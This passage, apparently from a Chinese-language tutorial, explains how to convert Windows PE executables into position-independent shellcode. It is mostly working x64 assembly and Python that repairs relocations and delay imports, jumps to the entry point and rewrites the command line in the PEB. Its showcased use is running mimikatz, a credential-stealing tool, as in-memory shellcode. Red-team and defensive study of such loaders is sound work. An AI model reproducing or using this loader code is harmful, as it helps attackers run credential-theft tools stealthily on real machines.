"skip_padding_entry:"			# If the last entry is a padding entry
" add rsi, 2;"				# Directly skip this entry


"next_block:"
" jmp loop_block;"


"basereloc_fixed_end:"
" sub rsp, 0x8;"			# Stack alignment

5：修复延迟导入表

对于有些复杂的 PE 文件，例如 mimikatz，有着延迟导入表，如果不修复便会报错。不过延迟导入表的结构以及修复原理与 IAT 十分接近。

"fix_delayed_import_dir:"
" call find_nt_header;"
" mov esi, [rax+0xf0];"			# ESI = DelayedImportDir RVA
" test esi, esi;"			# If RVA = 0?
" jz delayed_loop_end;"			# Skip delay import table fix
" add rsi, rbx;"			# RSI points to DelayedImportDir


"delayed_loop_module:"
" xor rcx, rcx;"			
" mov ecx, [rsi+4];"			# RCX = Module name string RVA
" test rcx, rcx;"			# If RVA = 0, then all modules are processed
" jz delayed_loop_end;"			# Exit the module loop
" add rcx, rbx;"			# RCX = Module name
" call r12;"				# Call LoadLibraryA
" mov rcx, rax;"			# Module handle for GetProcAddress for 1st arg
" xor r8, r8;"				
" xor rdx, rdx;"
" mov edx, [rsi+0x10];"			# EDX = INT RVA
" add rdx, rbx;"			# RDX points to INT
" mov r8d, [rsi+0xc];"			# R8 = IAT RVA
" add r8, rbx;"				# R8 points to IAT
" mov r14, rdx;"			# Backup INT Address
" mov r15, r8;"				# Backup IAT Address


"delayed_loop_func:"
" mov rdx, r14;"			# Restore INT Address + processed data
" mov r8, r15;"				# Restore IAT Address + processed data
" mov rdx, [rdx];"			# RDX = Name Address RVA
" test rdx, rdx;"			# If Name Address value is 0, then all functions are fixed
" jz delayed_next_module;"		# Process next module
" mov r9, 0x8000000000000000;"
" test rdx, r9;"			# Check if it is import by ordinal (highest bit set of NameAddress)
" mov rbp, rcx;"			# Save module base address
" jnz delayed_resolve_by_ordinal;"	# If set, resolve by ordinal


"delayed_resolve_by_name:"
" add rdx, rbx;"			# RDX points to NameAddress Table
" add rdx, 2;"				# RDX points to Function Name
" call r13;"				# Call GetProcAddress
" jmp delayed_update_iat;"		# Go to update IAT


"delayed_resolve_by_ordinal:"
" mov r9, 0x7fffffffffffffff;"
" and rdx, r9;"				# RDX = Ordinal number
" call r13;"				# Call GetProcAddress with ordinal


"delayed_update_iat:"
" mov rcx, rbp;"			# Restore module base address
" mov r8, r15;"				# Restore current IAT address + processed
" mov [r8], rax;"			# Write the resolved address to the IAT
" add r15, 0x8;"			# Move to the next IAT entry (64-bit addresses)
" add r14, 0x8;"			# Movce to the next INT entry
" jmp delayed_loop_func;"		# Repeat for the next function


"delayed_next_module:"
" add rsi, 0x20;"			# Move to next delayed imported module
" jmp delayed_loop_module;"		# Continue loop


"delayed_loop_end:"

6：跳转到 PE 入口

这里，我们已经完成了所需的修复啦。尽管对于更加复杂的 PE 文件，可能需要其他表的修复，例如 TLS 回调目录。将执行转至 PE 的入口

"all_completed:"        
" call find_nt_header;"
" xor r15, r15;"
" mov r15d, [rax+0x28];"		# R15 = Entry point RVA
" add r15, rbx;"			# R15 = Entry point    		
" jmp r15;"

7：杂项

为了动态地计算偏移，我们会生成 2 段 Shellcode，步骤 1 的 Shellcode 为一段，剩余的为一段。

    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    encoding, count = ks.asm(CODE)
    CODE_LEN = len(encoding) + 25     
    CODE_OFFSET = 4096 - CODE_LEN

增加对命令行的支持，原理是修改 PEB 中的命令行以及其长度。这样的修改对部分程序有效，但兼容性依旧不足够。

def generate_asm_by_cmdline(new_cmd):
    new_cmd_length = len(new_cmd) * 2 + 12
    unicode_cmd = [ord(c) for c in new_cmd]


    fixed_instructions = [
        "mov rsi, [rax + 0x20];			# RSI = Address of ProcessParameter",
        "add rsi, 0x70; 			# RSI points to CommandLine member",
        f"mov byte ptr [rsi], {new_cmd_length}; # Set Length to the length of new commandline",
        "mov byte ptr [rsi+2], 0xff; # Set the max length of cmdline to 0xff bytes",
        "mov rsi, [rsi+8]; # RSI points to the string",
        "mov dword ptr [rsi], 0x002e0031; 	# Push '.1'",
        "mov dword ptr [rsi+0x4], 0x00780065; 	# Push 'xe'",
        "mov dword ptr [rsi+0x8], 0x00200065; 	# Push ' e'"
    ]

    start_offset = 0xC
    dynamic_instructions = []
    for i, char in enumerate(unicode_cmd):
        hex_char = format(char, '04x')
        offset = start_offset + (i * 2) 
        if i % 2 == 0:
            dword = hex_char
        else:
            dword = hex_char + dword 
            instruction = f"mov dword ptr [rsi+0x{offset-2:x}], 0x{dword};"
            dynamic_instructions.append(instruction)
    if len(unicode_cmd) % 2 != 0:
        instruction = f"mov word ptr [rsi+0x{offset:x}], 0x{dword};"
        dynamic_instructions.append(instruction)
    final_offset = start_offset + len(unicode_cmd) * 2
    dynamic_instructions.append(f"mov byte ptr [rsi+0x{final_offset:x}], 0;")
    instructions = fixed_instructions + dynamic_instructions
    return "\n".join(instructions)

如果要尽可能更好地支持对命令行的解析，我们还需要对 GetCommandLineA，GetCommandLineW，__getmainargs, __wgetmainargs 函数进行 IAT Hook，修改对这些函数的实现。不过，不同的程序对参数的处理方法不同，即便对这 4 个函数都进行 Hook，依旧有无法正确解析命令行的程序。

我们来看看将 mimikatz 转换为 Shellcode 后的执行效果(mimi.bin是 mimikatz 的内存转储文件)：

甚至 UPX 加过壳的 calc 都能被转换成位置独立的 Shellcode 并运行：